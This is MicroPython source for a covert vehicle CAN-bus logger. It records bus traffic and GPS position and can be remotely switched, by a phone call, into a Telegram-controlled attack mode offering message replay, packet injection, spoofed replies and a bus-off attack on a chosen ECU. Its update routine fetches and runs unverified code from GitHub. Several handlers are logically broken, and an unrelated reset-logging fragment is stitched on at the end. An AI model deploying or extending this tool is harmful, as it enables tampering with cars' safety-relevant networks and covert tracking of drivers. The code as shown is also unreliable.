class CANLogger(object): def __init__(self): # Constants and variables # # UART cmd to en-/disable the GPS self.GPS_OFF = (0xB5, 0x62, 0x06, 0x04, 0x04, 0x00, 0x00, 0x00, 0x08, 0x00, 0x16, 0x74) self.GPS_ON = (0xB5, 0x62, 0x06, 0x04, 0x04, 0x00, 0x00, 0x00, 0x09, 0x00, 0x17, 0x76) self.SIM_DISABLED = False self.GPS_LOG_TIME = 5000 # 5s self.SHUTOFF_TIME = 30000 # 30s of no CAN activity self.TOKEN = "REDACTED" self.VERSION = 1.0 if 'sd' in os.listdir('/'): self.PATH = '/sd/' else: self.PATH = '' self.CAN_FILE = open(self.PATH + 'can.log', 'a+') # This will hold CAN IDs to be filtered for in the can log self.can_filter = [] self.allowed_users = ["610574975"] self.interrupt = False self.shutdown = False # Init modules # # GPS init self.gps_uart = UART(1, 9600) # init with given baudrate self.gps_uart.init(9600, bits=8, parity=None, stop=1, read_buf_len=512 // 2) # init with given parameters self.gps = MicropyGPS() # CAN init (500 MHz) self.can = CAN(1, CAN.NORMAL) # recv self.can2 = CAN(2, CAN.NORMAL) # send self.can.init(CAN.NORMAL, prescaler=4, sjw=1, bs1=14, bs2=6, auto_restart=True) self.can2.init(CAN.NORMAL, prescaler=4, sjw=1, bs1=14, bs2=6, auto_restart=True) self.can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0)) # SIM800L init sim_uart = UART(4, 9600, timeout=1000, read_buf_len=2048 // 4) self.modem = Modem(sim_uart) self.modem.initialize() try: self.modem.connect('internet.eplus.de') except: self.SIM_DISABLED = True print("LOG ONLY MODE (NO GSM)") # Clock init self.rtc = RTC() self.rtc.wakeup(5000) # wakeup call every 5s # Interrupt Flag init self.interrupt = False pyb.ExtInt('X5', pyb.ExtInt.IRQ_FALLING, pyb.Pin.PULL_UP, self.incoming_call) # Sleep pins for GSM self.gsm_sleep = pyb.Pin('X6', pyb.Pin.OUT_PP) self.gsm_sleep.value(0) if not self.SIM_DISABLED: # Software Update self.ota() # Telegram Bot self.telegram = TelegramBot(token=self.TOKEN, modem=self.modem) # Logs input to can.log # args will be separated by comma and printed each time a new line def log(self, *args, file='can.log'): # With this case writing to can.log is quite a lot faster, as closing a file takes ages due to writing to fs # But we must ensure to close the file at some point if file is not 'can.log': with open(self.PATH + file, 'a+') as f: print(','.join(args), file=f) os.sync() else: # ensure we have an open file # if self.CAN_FILE.closed: # closed does not exists, thus need workaround below try: self.CAN_FILE.read() except OSError: self.CAN_FILE = open(self.PATH + 'can.log', 'a+') print(','.join(args), file=self.CAN_FILE) # Override is working def ota(self): url = 'https://raw.githubusercontent.com/jsonnet/CANLogger/master/version' response = self.modem.http_request(url, 'GET') # If a newer version is available if float(response.text) > self.VERSION: url = 'https://raw.githubusercontent.com/jsonnet/CANLogger/master/code/main.py' response = self.modem.http_request(url, 'GET') # Override existing main file and reboot with open(self.PATH + 'main.py', 'w') as f: print(response.text, file=f) # Force buffer write and restart os.sync() machine.soft_reset() # Callback function for incoming call to initiate attack mode def incoming_call(self, _): # Hangup call self.modem.hangup() # Reactivate logger if called during sleep phase if self.shutdown: self.shutdown = False self.gsm_sleep.value(0) self.sendGPSCmd(self.GPS_ON) for u in self.allowed_users: self.telegram.send(u, 'Ready in attack mode!') # light up yellow to indicate attack mode LED(3).intensity(16) self.interrupt = True # PoC for Telegram def message_handler(self, messages): for message in messages: # Check permitted users if message['id'] not in self.allowed_users: continue if message[2] == '/start': self.telegram.send( message[0], 'CAN Logger in attack mode, ready for you!') else: if message['text'] == "log": params = message['text'].strip().split(" ")[1:] # get if params[0] == 'get': self.telegram.sendFile( message[0], open(self.PATH + 'can.log', 'rb')) # with open(self.PATH + 'can.log', 'r') as f: # data = f.read() # Okay, will print \n explicitly! # self.telegram.send(message[0], data) os.remove(self.PATH + 'can.log') # clear elif params[0] == 'clear': os.remove(self.PATH + 'can.log') else: self.helpMessage(message) elif message['text'] == "replay": # Find first message of id and resend x times params = message['text'].strip().split(" ")[1:] if len(params) < 2: self.helpMessage(message) continue id, times = params[0:1] while True: can_id, _, _, can_data = self.can.recv(0) if can_id == id: for _ in times: self.can2.send(can_data, can_id, timeout=1000) self.log("sent {} from {} {} times".format( can_data, can_id, times)) break elif message['text'] == "injection": params = message['text'].split(" ")[1:] if len(params) < 4: self.helpMessage(message) continue can_id, can_data, times, _delay = params[0:2] for _ in times: self.can2.send(can_data, can_id, timeout=1000) pyb.delay(_delay) elif message['text'] == "reply": params = message['text'].strip().split(" ")[1:] if len(params) < 4: self.helpMessage(message) continue id, message, id_a, answer = params[0:3] while True: can_id, _, _, can_data = self.can.recv(0) if can_id == id and can_data == message: self.can2.send(answer, id_a, timeout=1000) break elif message[ 'text'] == "busoff": # TODO WIP feature only manual at that point params = message['text'].strip().split(" ")[1:] if len(params) < 4: self.helpMessage(message) continue mark_id, vic_id, payload, _delay = params[0:3] self.can.setfilter(0, CAN.LIST16, 0, ( mark_id, vic_id, )) # Clear buffer (maybe/hopefully) for _ in range(5): if not self.can.any(0): break self.can.recv(0) count = 0 while count <= 5: can_id, _, _, can_data = self.can.recv(0) if can_id == mark_id: pyb.delay(_delay) self.can2.send(payload, vic_id, timeout=1000) while True: can_id, _, _, can_data = self.can.recv(0) if can_id == vic_id and can_data != payload: count = 0 break count += 1 # reset filter self.can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0)) elif message['text'] == "filter": # CAN Log Filter by ID params = message['text'].strip().split(" ")[1:] # add if params[0] == 'add': for id in params[1:]: self.can_filter.append(id) # remove elif params[0] == 'remove': for id in params[1:]: self.can_filter.remove(id) # clear elif params[0] == 'clear': self.can_filter.clear() else: self.helpMessage(message) elif message['text'] == "ota": self.ota() elif message['text'] == "help": self.helpMessage(message) elif message['text'] == "exit": LED(3).off() self.interrupt = False self.telegram.send(message[0], 'Executed!') def helpMessage(self, message): helpme = """ log get|clear - Retrieve or clear saved can data log replay id freq - Replay messages of given id reply id message answer - Reply to a specified message with an answer injection id data freq delay - Inject given can packet into bus at a given frequency busoff marker victim payload freq - Manual BUS off attack for given victim filter add|remove|clear id - Set a filter for when logging ota - Check and update newest version help - Displays this message exit - Exit this mode and return to logging """ self.telegram.send(message[0], helpme) def sendGPSCmd(self, cmd): for i in range(len(cmd)): self.gps_uart.writechar(cmd[i]) def loop(self): gps_time = utime.ticks_ms() while True: # Check if new messages arrived after shutdown if self.shutdown and not self.can.any(0): pyb.stop() # soft sleep (500 uA) continue elif self.shutdown and self.can.any(0): self.shutdown = False self.gsm_sleep.value(0) self.sendGPSCmd(self.GPS_ON) # Main loop if not self.interrupt: # Free memory # gc.collect() ## Logging mode ## # Only log gps once a few seconds if utime.ticks_ms() - gps_time >= self.GPS_LOG_TIME: gps_time = utime.ticks_ms() # if module retrieved data: update and log if self.gps_uart.any(): self.gps.updateall(self.gps_uart.read()) self.log(str(self.rtc.datetime()), self.gps.latitude_string(), self.gps.longitude_string(), self.gps.speed_string()) # Log new incoming can messages try: # throws OSError can_id, _, _, can_data = self.can.recv( 0, timeout=self.SHUTOFF_TIME) # Filter for CAN Log if not self.can_filter or can_id in self.can_filter: self.log(str(self.rtc.datetime()), str(can_id), binascii.hexlify(can_data).decode('utf-8')) except OSError: # We timed out from can connection -> could mean car is shut down self.shutdown = True self.CAN_FILE.close() os.sync() self.gsm_sleep.value(1) self.sendGPSCmd(self.GPS_OFF) continue else: ## Attack mode ## self.CAN_FILE.close() # Close log file first os.sync() while self.interrupt: self.telegram.listen(self.message_handler)
connectedToUsb = pyb.USB_VCP().isconnected() if (connectedToUsb): print("current directory=%s" % uos.getcwd()) print("directory contents=%s" % uos.listdir()) file = uio.open(filename, "rt") #print("file contents:") #print(file.read()); lines = str.split(file.read()) powerOnReset = str.split(lines[0], "=")[1] externalReset = str.split(lines[1], "=")[1] else: powerOnReset = rtc.info() & 0x00010000 != 0 externalReset = rtc.info() & 0x00020000 != 0 file = uio.open(filename, "wt") file.write("powerOnReset=%s\n" % powerOnReset) file.write("externalReset=%s\n" % externalReset) file.flush() file.close() if (connectedToUsb): print("powerOnReset=%s, externalReset=%s" % (powerOnReset, externalReset)) rtc.wakeup(5000) # Enter Deepsleep Mode. #machine.deepsleep()